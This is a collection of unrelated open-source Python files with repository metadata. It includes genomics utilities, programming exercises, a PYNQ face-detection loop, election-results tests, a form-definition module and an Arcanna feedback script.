        return '<%s at %s>\n%s' % (self.__class__.__name__, id(self), self.text)
def internet_on(timeout=1):
    """Best-effort connectivity check against genome.ucsc.edu.

    Returns True when the request succeeds within *timeout* seconds,
    False on URLError.
    """
    try:
        urllib.request.urlopen('http://genome.ucsc.edu', timeout=timeout)
    except urllib.error.URLError:
        return False
    return True
def get_chromsizes_from_ucsc(genome, saveas=None, mysql='mysql', timeout=None):
    """
    Download chrom size info for *genome* from UCSC and returns the dictionary.
    If you need the file, then specify a filename with *saveas* (the dictionary
    will still be returned as well).
    If ``mysql`` is not on your path, specify where to find it with
    *mysql=<path to mysql executable>*.
    *timeout* is how long to wait for a response; mostly used for testing.
    Example usage:
    >>> dm3_chromsizes = get_chromsizes_from_ucsc('dm3')
    >>> for i in sorted(dm3_chromsizes.items()):
    ...     print('{0}: {1}'.format(*i))
    chr2L: (0, 23011544)
    chr2LHet: (0, 368872)
    chr2R: (0, 21146708)
    chr2RHet: (0, 3288761)
    chr3L: (0, 24543557)
    chr3LHet: (0, 2555491)
    chr3R: (0, 27905053)
    chr3RHet: (0, 2517507)
    chr4: (0, 1351857)
    chrM: (0, 19517)
    chrU: (0, 10049037)
    chrUextra: (0, 29004656)
    chrX: (0, 22422827)
    chrXHet: (0, 204112)
    chrYHet: (0, 347038)
    """
    if not internet_on(timeout=timeout):
        raise ValueError('It appears you don\'t have an internet connection '
                         '-- unable to get chromsizes from UCSC')
    # Query UCSC's public MySQL mirror for the chromInfo table.
    cmds = [mysql,
            '--user=genome',
            '--host=genome-mysql.cse.ucsc.edu',
            '-A',
            '-e',
            'select chrom, size from %s.chromInfo' % genome]
    try:
        p = subprocess.Popen(cmds,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE,
                             bufsize=1)
        stdout, stderr = p.communicate()
        if stderr:
            print(stderr)
            print('Commands were:\n')
            print((subprocess.list2cmdline(cmds)))
        # First line is the column header; skip it.
        lines = stdout.splitlines()[1:]
        d = {}
        for line in lines:
            if isinstance(line, bytes):
                line = line.decode('UTF-8')
            chrom, size = line.split()
            # Sizes are stored as (start, stop) tuples; see chromsizes().
            d[chrom] = (0, int(size))
        if saveas is not None:
            chromsizes_to_file(d, saveas)
        return d
    except OSError as err:
        # errno 2 == ENOENT: the mysql client itself was not found.
        if err.errno == 2:
            raise OSError("Can't find mysql -- if you don't have it "
                          "installed, you'll have to get chromsizes "
                          " manually, or "
                          "specify the path with the 'mysql' kwarg.")
        else:
            raise
def chromsizes_to_file(chrom_sizes, fn=None):
    """
    Converts a *chromsizes* dictionary to a file. If *fn* is None, then a
    tempfile is created (which can be deleted with pybedtools.cleanup()).
    Returns the filename.
    """
    if fn is None:
        tmp = tempfile.NamedTemporaryFile(prefix='pybedtools.',
                                          suffix='.tmp', delete=False)
        fn = tmp.name
        filenames.TEMPFILES.append(fn)
    if isinstance(chrom_sizes, str):
        # A genome assembly name was given; look up its sizes first.
        chrom_sizes = chromsizes(chrom_sizes)
    with open(fn, 'wt') as fout:
        for chrom, bounds in sorted(chrom_sizes.items()):
            fout.write(chrom + '\t' + str(bounds[1]) + '\n')
    return fn
def chromsizes(genome):
    """Return {chrom: (start, stop)} size tuples for *genome*.

    Looks for the assembly in the bundled genome registry first; on a
    miss, falls back to querying UCSC via get_chromsizes_from_ucsc().
    Sizes are (start, stop) tuples rather than bare lengths so that
    randomization can be restricted to sub-regions (e.g. the extent of a
    tiling array).

    Example: ``chromsizes('dm3')['chr2L'] == (0, 23011544)``.
    """
    if hasattr(genome_registry, genome):
        return getattr(genome_registry, genome)
    return get_chromsizes_from_ucsc(genome)
# Remove this session's temp files automatically at interpreter exit.
atexit.register(cleanup)
| 31.039829 | 106 | 0.552266 |
afd49eaad94da79c1a03b21a1fa9bf0e6ff50d67
| 264 |
py
|
Python
|
7-assets/_SNIPPETS/bryan-guner-gists/pypractice/multiplication-table.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
7-assets/_SNIPPETS/bryan-guner-gists/pypractice/multiplication-table.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
7-assets/_SNIPPETS/bryan-guner-gists/pypractice/multiplication-table.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
# take a number as an input from user and print a multiplication table of that number
def multiplication_table(value=None):
    """Print the multiplication table of *value* from 1 to 10.

    Generalized: *value* may now be passed directly; when omitted (the
    original behavior) the number is read interactively from the user.
    """
    if value is None:
        value = int(input('please type a number: '))
    for num in range(1, 11):
        print(f'{value} * {num} = {value * num}' )
multiplication_table()
| 29.333333 | 85 | 0.67803 |
bb8c08fbf65670b5f9a49f0058783a8bd8f24e70
| 2,030 |
py
|
Python
|
teams/team_joy_of_pink/Xilinx_Hackathon_Master/videoHDMI_FD.py
|
AbinMM/PYNQ_Hackathon_2017
|
711c75e8590b02f313295cef712188691690c948
|
[
"BSD-3-Clause"
] | 19 |
2017-10-08T03:18:38.000Z
|
2020-07-07T02:34:18.000Z
|
teams/team_joy_of_pink/Xilinx_Hackathon_Master/videoHDMI_FD.py
|
AbinMM/PYNQ_Hackathon_2017
|
711c75e8590b02f313295cef712188691690c948
|
[
"BSD-3-Clause"
] | 2 |
2017-10-08T03:15:10.000Z
|
2017-10-10T16:10:32.000Z
|
teams/team_joy_of_pink/Xilinx_Hackathon_Master/videoHDMI_FD.py
|
AbinMM/PYNQ_Hackathon_2017
|
711c75e8590b02f313295cef712188691690c948
|
[
"BSD-3-Clause"
] | 28 |
2017-10-07T23:24:36.000Z
|
2022-03-29T08:03:40.000Z
|
# PYNQ webcam -> HDMI passthrough with Haar-cascade face detection overlay.
from pynq.overlays.base import BaseOverlay
from pynq.lib.video import *
from matplotlib import pyplot as plt
import numpy as np
import cv2
# Load the FPGA base overlay bitstream.
base = BaseOverlay("base.bit")
# monitor configuration: 640*480 @ 60Hz
Mode = VideoMode(640,480,24)
hdmi_out = base.video.hdmi_out
hdmi_out.configure(Mode,PIXEL_BGR)
hdmi_out.start()
# monitor (output) frame buffer size
frame_out_w = 1920
frame_out_h = 1080
# camera (input) configuration
frame_in_w = 640
frame_in_h = 480
# Open the first USB webcam and request the input resolution.
videoIn = cv2.VideoCapture(0)
videoIn.set(cv2.CAP_PROP_FRAME_WIDTH, frame_in_w);
videoIn.set(cv2.CAP_PROP_FRAME_HEIGHT, frame_in_h);
print("Capture device is open: " + str(videoIn.isOpened()))
# NOTE(review): numpy is imported a second time here (already imported as
# np above); PIL/ImageGrab/Grove imports below are unused in this script.
import numpy as np
import PIL
import pyscreenshot as ImageGrab
from pynq.lib.arduino import Grove_Buzzer
from pynq.lib.arduino import ARDUINO_GROVE_G1
# Display webcam image via HDMI Out
#imgemoji = cv2.imread('mj1.jpg',-1)
#orig_mask = imgemoji[:,:,2]
# Create the inverted mask for the mustache
#orig_mask_inv = cv2.bitwise_not(orig_mask)
#imgmj = imgemoji[:,:,0:2]
#origemojiHeight, origemojiWidth = imgmj.shape[:2]
# Main loop: grab a frame, draw face boxes, push to HDMI.
while(True):
    ret, frame_vga = videoIn.read()
    if (ret):
        np_frame = frame_vga
        # NOTE(review): the cascade is reloaded from disk on every frame;
        # hoisting this above the loop would avoid repeated file I/O.
        face_cascade = cv2.CascadeClassifier(
            '/home/xilinx/jupyter_notebooks/base/video/data/'
            'haarcascade_frontalface_default.xml')
        gray = cv2.cvtColor(np_frame, cv2.COLOR_BGR2GRAY)
        faces = face_cascade.detectMultiScale(gray, 1.3, 5)
        for (x,y,w,h) in faces:
            # Blue rectangle around each detected face (drawn in-place,
            # so it also appears in frame_vga sent to HDMI below).
            cv2.rectangle(np_frame,(x,y),(x+w,y+h),(255,0,0),2)
            roi_gray = gray[y:y+h, x:x+w]
            roi_color = np_frame[y:y+h, x:x+w]
        outframe = hdmi_out.newframe()
        outframe[0:480,0:640,:] = frame_vga[0:480,0:640,:]
        hdmi_out.writeframe(outframe)
        # Also persist the latest annotated frame to disk.
        cv2.imwrite("frame.jpg",frame_vga)
        cv2.waitKey(50)
    else:
        raise RuntimeError("Failed to read from camera.")
    #grove_buzzer = Grove_Buzzer(base.ARDUINO,ARDUINO_GROVE_G1)
    #grove_buzzer.play_melody()
| 29.42029 | 63 | 0.692611 |
bbb110fe24d1f99f3cd3fc4417e1ebb0e1097ca3
| 238 |
py
|
Python
|
Online-Judges/CodingBat/Python/Logic-02/Logic_2-04-no_teen_sum.py
|
shihab4t/Competitive-Programming
|
e8eec7d4f7d86bfa1c00b7fbbedfd6a1518f19be
|
[
"Unlicense"
] | 3 |
2021-06-15T01:19:23.000Z
|
2022-03-16T18:23:53.000Z
|
Online-Judges/CodingBat/Python/Logic-02/Logic_2-04-no_teen_sum.py
|
shihab4t/Competitive-Programming
|
e8eec7d4f7d86bfa1c00b7fbbedfd6a1518f19be
|
[
"Unlicense"
] | null | null | null |
Online-Judges/CodingBat/Python/Logic-02/Logic_2-04-no_teen_sum.py
|
shihab4t/Competitive-Programming
|
e8eec7d4f7d86bfa1c00b7fbbedfd6a1518f19be
|
[
"Unlicense"
] | null | null | null |
def fix_teen(n):
    """Return *n* with "teen" values fixed to 0.

    Teens are 13-19 except 15 and 16.  Bug fix: the original implicitly
    returned None for non-teen values, so fix_teen had no usable return
    for them and no_teen_sum only worked by accident (None != 0).
    """
    if 13 <= n <= 14 or 17 <= n <= 19:
        return 0
    return n
def no_teen_sum(a, b, c):
    """Return a + b + c, where teen values (except 15 and 16) count as 0."""
    return fix_teen(a) + fix_teen(b) + fix_teen(c)
| 18.307692 | 54 | 0.453782 |
a59a7b92c51a2d21e18fafaf6589e0318110cfae
| 613 |
py
|
Python
|
Contests/CCC/CCC '00 J3 - Slot Machines.py
|
MastaCoder/Projects
|
ebb0a3134522b12f052fec8d753005f384adf1b1
|
[
"MIT"
] | 5 |
2018-10-11T01:55:40.000Z
|
2021-12-25T23:38:22.000Z
|
Contests/CCC/CCC '00 J3 - Slot Machines.py
|
MastaCoder/mini_projects
|
ebb0a3134522b12f052fec8d753005f384adf1b1
|
[
"MIT"
] | null | null | null |
Contests/CCC/CCC '00 J3 - Slot Machines.py
|
MastaCoder/mini_projects
|
ebb0a3134522b12f052fec8d753005f384adf1b1
|
[
"MIT"
] | 1 |
2019-02-22T14:42:50.000Z
|
2019-02-22T14:42:50.000Z
|
q = int(input(""))
s1 = int(input(""))
s2 = int(input(""))
s3 = int(input(""))
s1 = s1 - ((s1 // 35) * 35)
s2 = s2 - ((s2 // 100) * 100)
s3 = s3 - ((s3 // 10) * 10)
a = 0
while q > 0:
s1 += 1
if s1 == 35:
s1 = 0
q += 30
q -= 1
if q == 0:
a += 1
break
s2 += 1
if s2 == 100:
s2 = 0
q += 60
q -= 1
if q == 0:
a += 2
break
s3 += 1
if s3 == 10:
s3 = 0
q += 9
q -= 1
a += 3
print("Martha plays " + str(a) + " times before going broke.")
| 14.255814 | 62 | 0.319739 |
f9eedf671ef8e1104fd89c9f97e4d00a534d4a08
| 770 |
py
|
Python
|
Python/EstruturaSequencial/Exercicios/Exercicio14.py
|
ekballo/Back-End
|
b252e3b2a16ce36486344823f14afa6691fde9bc
|
[
"MIT"
] | null | null | null |
Python/EstruturaSequencial/Exercicios/Exercicio14.py
|
ekballo/Back-End
|
b252e3b2a16ce36486344823f14afa6691fde9bc
|
[
"MIT"
] | null | null | null |
Python/EstruturaSequencial/Exercicios/Exercicio14.py
|
ekballo/Back-End
|
b252e3b2a16ce36486344823f14afa6691fde9bc
|
[
"MIT"
] | null | null | null |
#João Papo-de-Pescador, homem de bem, comprou um microcomputador.
# para controlar o rendimento diário de seu trabalho.
# Toda vez que ele traz um peso de peixes.
# maior que o estabelecido pelo regulamento de pesca do estado de São Paulo.
# (50 quilos) deve pagar uma multa de R$ 4,00 por quilo excedente.
# João precisa que você faça um programa que leia a variável peso (peso de peixes) e calcule o excesso.
# Gravar na variável excesso a quantidade de quilos além do limite e na variável multa.
# o valor da multa que João deverá pagar.
# Imprima os dados do programa com as mensagens adequadas.
excesso = float(input('Digite o peso em excesso Kg: '))
multa = 4.00
resultado = multa * excesso
print('O valor pago pelo peso exedido é {}R$'.format(resultado))
| 42.777778 | 104 | 0.750649 |
55a2dd3916f80e081d97e45c5793506134701604
| 325 |
py
|
Python
|
Programming Languages/Python/Theory/100_Python_Challenges/Section _1_Basic_Coding_Exercises/16. check if a function returns a whole number without decimals after dividing.py
|
jaswinder9051998/Resources
|
fd468af37bf24ca57555d153ee64693c018e822e
|
[
"MIT"
] | 101 |
2021-12-20T11:57:11.000Z
|
2022-03-23T09:49:13.000Z
|
Programming Languages/Python/Theory/100_Python_Challenges/Section _1_Basic_Coding_Exercises/16. check if a function returns a whole number without decimals after dividing.py
|
Sid-1164/Resources
|
3987dcaeddc8825f9bc79609ff26094282b8ece1
|
[
"MIT"
] | 4 |
2022-01-12T11:55:56.000Z
|
2022-02-12T04:53:33.000Z
|
Programming Languages/Python/Theory/100_Python_Challenges/Section _1_Basic_Coding_Exercises/16. check if a function returns a whole number without decimals after dividing.py
|
Sid-1164/Resources
|
3987dcaeddc8825f9bc79609ff26094282b8ece1
|
[
"MIT"
] | 38 |
2022-01-12T11:56:16.000Z
|
2022-03-23T10:07:52.000Z
|
"""
Write a Python function that takes a division equation d and checks
if it returns a whole number without decimals after dividing.
Examples:
check_division(4/2) ➞ True
check_division(25/2) ➞ False
"""
def check_division(num):
if num % 2 == 0:
return num, True
else:
return num, False
| 18.055556 | 68 | 0.661538 |
75dcf75ba51fe6e7bf8c974c475c690dc9661093
| 6,940 |
py
|
Python
|
tests/onegov/election_day/utils/test_svg_generator.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
tests/onegov/election_day/utils/test_svg_generator.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
tests/onegov/election_day/utils/test_svg_generator.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from freezegun import freeze_time
from io import StringIO
from tests.onegov.election_day.utils.common import add_election_compound
from tests.onegov.election_day.utils.common import add_majorz_election
from tests.onegov.election_day.utils.common import add_proporz_election
from tests.onegov.election_day.utils.common import add_vote
from tests.onegov.election_day.utils.common import PatchedD3Renderer
from onegov.election_day.utils.svg_generator import SvgGenerator
from pytest import raises
from unittest.mock import patch
class PatchedSvgGenerator(SvgGenerator):
def __init__(self, app):
super(PatchedSvgGenerator, self).__init__(app)
self.renderer = PatchedD3Renderer(app)
def test_generate_svg(election_day_app_gr, session):
generator = SvgGenerator(election_day_app_gr)
with raises(AttributeError):
generator.generate_svg(None, 'things', 'de_CH')
svg = StringIO('<svg></svg>')
with patch.object(generator.renderer, 'get_chart', return_value=svg) as gc:
with freeze_time("2014-04-04 14:00"):
item = add_majorz_election(session)
lm = item.last_modified
generator.generate_svg(item, 'lists', lm, 'de_CH')
generator.generate_svg(item, 'candidates', lm, 'de_CH')
generator.generate_svg(item, 'candidates', lm)
generator.generate_svg(item, 'connections', lm, 'de_CH')
generator.generate_svg(item, 'party-strengths', lm, 'de_CH')
generator.generate_svg(item, 'parties-panachage', lm, 'de_CH')
generator.generate_svg(item, 'lists-panachage', lm, 'de_CH')
generator.generate_svg(item, 'entities-map', lm, 'de_CH')
generator.generate_svg(item, 'districts-map', lm, 'de_CH')
item = add_proporz_election(session)
lm = item.last_modified
generator.generate_svg(item, 'lists', lm, 'de_CH')
generator.generate_svg(item, 'candidates', lm, 'de_CH')
generator.generate_svg(item, 'connections', lm, 'de_CH')
generator.generate_svg(item, 'party-strengths', lm, 'de_CH')
generator.generate_svg(item, 'parties-panachage', lm, 'de_CH')
generator.generate_svg(item, 'lists-panachage', lm, 'de_CH')
generator.generate_svg(item, 'entities-map', lm, 'de_CH')
generator.generate_svg(item, 'districts-map', lm, 'de_CH')
item = add_election_compound(session)
lm = item.last_modified
generator.generate_svg(item, 'lists', lm, 'de_CH')
generator.generate_svg(item, 'candidates', lm, 'de_CH')
generator.generate_svg(item, 'connections', lm, 'de_CH')
generator.generate_svg(item, 'party-strengths', lm, 'de_CH')
generator.generate_svg(item, 'parties-panachage', lm, 'de_CH')
generator.generate_svg(item, 'lists-panachage', lm, 'de_CH')
generator.generate_svg(item, 'entities-map', lm, 'de_CH')
generator.generate_svg(item, 'districts-map', lm, 'de_CH')
item = add_vote(session, 'complex').proposal
lm = item.vote.last_modified
generator.generate_svg(item, 'lists', lm, 'de_CH')
generator.generate_svg(item, 'candidates', lm, 'de_CH')
generator.generate_svg(item, 'connections', lm, 'de_CH')
generator.generate_svg(item, 'party-strengths', lm, 'de_CH')
generator.generate_svg(item, 'parties-panachage', lm, 'de_CH')
generator.generate_svg(item, 'lists-panachage', lm, 'de_CH')
generator.generate_svg(item, 'entities-map', lm, 'de_CH')
generator.generate_svg(item, 'districts-map', lm, 'de_CH')
generator.generate_svg(item, 'entities-map', lm, 'it_CH')
generator.generate_svg(item, 'entities-map', lm, 'it_CH')
with freeze_time("2015-05-05 15:00"):
lm = item.vote.last_modified
generator.generate_svg(item, 'map', lm, 'it_CH')
assert gc.call_count == 13
ts = '1396620000'
hm = '41c18975bf916862ed817b7c569b6f242ca7ad9f86ca73bbabd8d9cb26858440'
hp = '624b5f68761f574adadba4145283baf97f21e2bd8b87d054b57d936dac6dedff'
hc = '9130b66132f65a4d5533fecad8cdf1f9620a42733d6dfd7d23ea123babecf4c7'
hb = item.id
files = election_day_app_gr.filestorage.listdir('svg')
assert sorted(files) == sorted([
f'election-{hm}.{ts}.candidates.de_CH.svg',
f'election-{hm}.{ts}.candidates.any.svg',
f'election-{hp}.{ts}.lists.de_CH.svg',
f'election-{hp}.{ts}.candidates.de_CH.svg',
f'election-{hp}.{ts}.connections.de_CH.svg',
f'election-{hp}.{ts}.party-strengths.de_CH.svg',
f'election-{hp}.{ts}.parties-panachage.de_CH.svg',
f'election-{hp}.{ts}.lists-panachage.de_CH.svg',
f'election-{hc}.{ts}.party-strengths.de_CH.svg',
f'election-{hc}.{ts}.parties-panachage.de_CH.svg',
f'ballot-{hb}.{ts}.entities-map.de_CH.svg',
f'ballot-{hb}.{ts}.districts-map.de_CH.svg',
f'ballot-{hb}.{ts}.entities-map.it_CH.svg'
])
def test_create_svgs(election_day_app_gr):
generator = SvgGenerator(election_day_app_gr)
session = election_day_app_gr.session()
fs = election_day_app_gr.filestorage
svg = StringIO('<svg></svg>')
with patch.object(generator.renderer, 'get_chart', return_value=svg) as gc:
generator.create_svgs()
assert gc.call_count == 0
assert election_day_app_gr.filestorage.listdir('svg') == []
with freeze_time("2014-04-04 14:00"):
majorz = add_majorz_election(session)
proporz = add_proporz_election(session)
compound = add_election_compound(session)
vote = add_vote(session, 'complex')
generator.create_svgs()
assert gc.call_count == 33
assert len(fs.listdir('svg')) == 33
generator.create_svgs()
assert gc.call_count == 33
assert len(fs.listdir('svg')) == 33
fs.touch('svg/somefile')
fs.touch('svg/some.file')
fs.touch('svg/.somefile')
generator.create_svgs()
assert gc.call_count == 33
assert len(fs.listdir('svg')) == 33
session.delete(vote)
session.delete(proporz)
session.delete(compound)
session.flush()
generator.create_svgs()
assert gc.call_count == 33
assert len(fs.listdir('svg')) == 1
with freeze_time("2014-04-05 14:00"):
majorz.title = 'Election'
session.flush()
generator.create_svgs()
assert gc.call_count == 34
assert len(fs.listdir('svg')) == 1
session.delete(majorz)
session.flush()
generator.create_svgs()
assert gc.call_count == 34
assert len(fs.listdir('svg')) == 0
| 42.576687 | 79 | 0.637032 |
f985633aabb3522a60768d27843b603693bf5848
| 720 |
py
|
Python
|
benwaonline/schemas/tag_schema.py
|
goosechooser/benwaonline
|
e2879412aa6c3c230d25cd60072445165517b6b6
|
[
"MIT"
] | null | null | null |
benwaonline/schemas/tag_schema.py
|
goosechooser/benwaonline
|
e2879412aa6c3c230d25cd60072445165517b6b6
|
[
"MIT"
] | 16 |
2017-09-13T10:21:40.000Z
|
2020-06-01T04:32:22.000Z
|
benwaonline/schemas/tag_schema.py
|
goosechooser/benwaonline
|
e2879412aa6c3c230d25cd60072445165517b6b6
|
[
"MIT"
] | null | null | null |
from marshmallow_jsonapi import fields
from benwaonline.schemas import BaseSchema
class TagSchema(BaseSchema):
id = fields.String()
name = fields.String()
created_on = fields.DateTime()
num_posts = fields.Int()
class Meta:
type_ = 'tags'
self_url = '/api/tags/{id}'
self_url_kwargs = {'id': '<id>'}
self_url_many = '/api/tags'
posts = fields.Relationship(
type_='posts',
self_url = '/api/tags/{id}/relationships/posts',
self_url_kwargs = {'id': '<id>'},
related_url = '/api/tags/{id}/posts',
related_url_kwargs = {'id': '<id>'},
many=True,
include_resource_linkage=True,
schema='PostSchema'
)
| 27.692308 | 56 | 0.595833 |
f9caa36ee0a597a47c10fc40b5137038c308e2ad
| 43 |
py
|
Python
|
Curso_Python/Secao2-Python-Basico-Logica-Programacao/11/aula11.py
|
pedrohd21/Cursos-Feitos
|
b223aad83867bfa45ad161d133e33c2c200d42bd
|
[
"MIT"
] | null | null | null |
Curso_Python/Secao2-Python-Basico-Logica-Programacao/11/aula11.py
|
pedrohd21/Cursos-Feitos
|
b223aad83867bfa45ad161d133e33c2c200d42bd
|
[
"MIT"
] | null | null | null |
Curso_Python/Secao2-Python-Basico-Logica-Programacao/11/aula11.py
|
pedrohd21/Cursos-Feitos
|
b223aad83867bfa45ad161d133e33c2c200d42bd
|
[
"MIT"
] | null | null | null |
#todo: resolução do exercicio da aula10 imc
| 43 | 43 | 0.813953 |
ddfa4e381f52bfa1b56f32b7e7ccfba411c5337a
| 1,066 |
py
|
Python
|
exercises/es/test_04_07.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 2,085 |
2019-04-17T13:10:40.000Z
|
2022-03-30T21:51:46.000Z
|
exercises/es/test_04_07.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 79 |
2019-04-18T14:42:55.000Z
|
2022-03-07T08:15:43.000Z
|
exercises/es/test_04_07.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 361 |
2019-04-17T13:34:32.000Z
|
2022-03-28T04:42:45.000Z
|
def test():
assert "nlp.begin_training()" in __solution__, "¿Llamaste a nlp.begin_training?"
assert (
"range(10)" in __solution__
), "¿Estás entrenando por el número correcto de iteraciones?"
assert (
"spacy.util.minibatch(TRAINING_DATA" in __solution__
), "¿Estás usando la herramienta minibatch para crear lotes de los datos de entrenamiento?"
assert (
"text for text" in __solution__ and "entities for text" in __solution__
), "¿Estás separando los textos y las anotaciones correctamente?"
assert "nlp.update" in __solution__, "¿Estás actualizando el modelo?"
__msg__.good(
"Buen trabajo – has entrenado exitosamente tu primer modelo de spaCy. Los "
"números impresos en la terminal representan la pérdida en cada iteración, "
"la cantidad de trabajo que aún queda para el optimizer. Mientras más bajo "
"el número, mejor. En la vida real normalmente querrías usar *muchos* más "
"datos que esto, idealmente por lo menos unos cientos o miles de ejemplos."
)
| 50.761905 | 95 | 0.696998 |
34bf79fe6530032d8f88652ce09124d5d56cfe92
| 1,325 |
py
|
Python
|
format.py
|
DanGrayson/cgc1
|
b9d2de234694aa454248d9bc10ccb22ab92792cd
|
[
"MIT"
] | 5 |
2015-07-28T17:45:21.000Z
|
2019-11-24T15:47:01.000Z
|
format.py
|
DanGrayson/cgc1
|
b9d2de234694aa454248d9bc10ccb22ab92792cd
|
[
"MIT"
] | 1 |
2020-05-22T15:21:36.000Z
|
2020-05-22T15:38:48.000Z
|
format.py
|
DanGrayson/cgc1
|
b9d2de234694aa454248d9bc10ccb22ab92792cd
|
[
"MIT"
] | 1 |
2020-05-09T21:24:10.000Z
|
2020-05-09T21:24:10.000Z
|
#! /usr/bin/python
#Copyright (c) 2014 Gary Furnish
#Licensed under the MIT License (MIT)
import os, fnmatch, json, sys
from multiprocessing import Pool
from utilities import printing_system
with open("settings.json") as settings_file:
settings_json = json.loads(settings_file.read())
clang_install_location = settings_json["clang_install_location"]
clang_install_location = os.path.abspath(clang_install_location)
#See https://stackoverflow.com/questions/2186525/use-a-glob-to-find-files-recursively-in-python
def find_files(directories, patterns):
for directory in directories:
for pattern in patterns:
for root, dirs, files in os.walk(directory):
for basename in files:
if fnmatch.fnmatch(basename, pattern):
filename = os.path.join(root, basename)
yield filename
def format(filename):
printing_system(clang_install_location+"/clang-format -style=file -i " + filename)
pool = Pool()
import sys
if len(sys.argv)==2:
files = list(find_files([sys.argv[1]],["*.cpp","*.cc","*.hpp","*.h"]))
else:
files = list(find_files(["cgc1","cgc1_test","cgc1_alloc_benchmark","mcppalloc", "mcpposutil", "mcpputil","mcppconcurrency"],["*.cpp","*.hpp"]))
pool.map(format,files)
sys.exit(0)
| 35.810811 | 147 | 0.677736 |
1f2e84557af81efccdc31def2c679518080da25b
| 2,333 |
py
|
Python
|
src/onegov/org/forms/form_definition.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/org/forms/form_definition.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/org/forms/form_definition.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from onegov.core.utils import normalize_for_url
from onegov.form import Form, merge_forms, FormDefinitionCollection
from onegov.form.validators import ValidFormDefinition
from onegov.org import _
from onegov.org.forms.fields import HtmlField
from onegov.org.forms.generic import PaymentMethodForm
from wtforms import StringField, TextAreaField, validators
class FormDefinitionBaseForm(Form):
""" Form to edit defined forms. """
title = StringField(_("Title"), [validators.InputRequired()])
lead = TextAreaField(
label=_("Lead"),
description=_("Describes what this form is about"),
render_kw={'rows': 4})
text = HtmlField(
label=_("Text"))
group = StringField(
label=_("Group"),
description=_("Used to group the form in the overview"))
definition = TextAreaField(
label=_("Definition"),
validators=[validators.InputRequired(), ValidFormDefinition()],
render_kw={'rows': 32, 'data-editor': 'form'})
pick_up = TextAreaField(
label=_("Pick-Up"),
description=_("Describes how this resource can be picked up. "
"This text is used on the ticket status page to "
"inform the user")
)
class FormDefinitionForm(merge_forms(
FormDefinitionBaseForm,
PaymentMethodForm
)):
pass
class FormDefinitionUrlForm(Form):
name = StringField(
label=_('Url path'),
validators=[validators.InputRequired()]
)
def ensure_correct_name(self):
if not self.name.data:
return
if self.model.name == self.name.data:
self.name.errors.append(
_('Please fill out a new name')
)
return False
normalized_name = normalize_for_url(self.name.data)
if not self.name.data == normalized_name:
self.name.errors.append(
_('Invalid name. A valid suggestion is: ${name}',
mapping={'name': normalized_name})
)
return False
duplicate_text = _("An entry with the same name exists")
other_entry = FormDefinitionCollection(self.request.session).by_name(
normalized_name)
if other_entry:
self.name.errors.append(duplicate_text)
return False
| 29.910256 | 77 | 0.630519 |
c096098785b8f40d1394f6c218b27d974609a9c9
| 99 |
py
|
Python
|
python/advanced_sw/IP_COLLECTOR/test1.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 16 |
2018-11-26T08:39:42.000Z
|
2019-05-08T10:09:52.000Z
|
python/advanced_sw/IP_COLLECTOR/test1.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 8 |
2020-05-04T06:29:26.000Z
|
2022-02-12T05:33:16.000Z
|
python/advanced_sw/IP_COLLECTOR/test1.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 5 |
2020-02-11T16:02:21.000Z
|
2021-02-05T07:48:30.000Z
|
from selenium import webdriver
browser = webdriver.Firefox()
browser.get('http://seleniumhq.org/')
| 24.75 | 37 | 0.777778 |
c0ea4a26de553916d8a6a2bcc33b73c31f7eb22a
| 4,783 |
py
|
Python
|
Packs/Arcanna/Scripts/ArcannaFeedbackPostProcessingScript/ArcannaFeedbackPostProcessingScript.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/Arcanna/Scripts/ArcannaFeedbackPostProcessingScript/ArcannaFeedbackPostProcessingScript.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/Arcanna/Scripts/ArcannaFeedbackPostProcessingScript/ArcannaFeedbackPostProcessingScript.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
ARCANNA_AUTO_CLOSED_TICKET_PLAYBOOK_PLACEHOLDER = "Arcanna decision:"
def get_value_from_context(key):
return demisto.get(demisto.context(), key)
def send_arcanna_feedback(close_notes, close_reason, closing_user, event_id, job_id):
ret = demisto.executeCommand("arcanna-send-event-feedback", {
"job_id": job_id,
"event_id": event_id,
"label": close_reason,
"username": closing_user,
"closing_notes": close_notes
})
return ret
